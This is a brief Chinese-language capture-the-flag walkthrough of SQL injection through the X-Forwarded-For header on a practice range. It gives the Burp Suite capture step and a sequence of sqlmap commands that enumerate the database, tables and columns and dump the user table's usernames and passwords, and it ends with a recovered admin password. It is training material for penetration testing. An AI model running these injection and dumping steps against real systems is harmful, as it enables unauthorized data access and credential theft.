X-Forwarded-For注入漏洞实战
难易程度:★★
题目类型:SQL注入
使用工具:FireFox浏览器、kali
1.打开靶场,使用burpsuite,登录,截包。
send to repeater,在下方加入一句X-Forward-For:*,右键save item,导出文件。
2.打开kali,使用sqlmap爆库名。
输入sqlmap -r 1.txt --current-db --batch
得到库名webcalendar
3.接着爆表名,sqlmap -r 1.txt -D webcalendar --tables --batch
得到两个表名,肯定是user。
4.再接着爆列名,sqlmap -r 1.txt -D webcalendar -T user --columns --batch
5.最后显示username和password,输入sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch
得到两组账号密码,组合一下得到正确账号密码。
6.账号为admin,密码为42899124,登录获取key。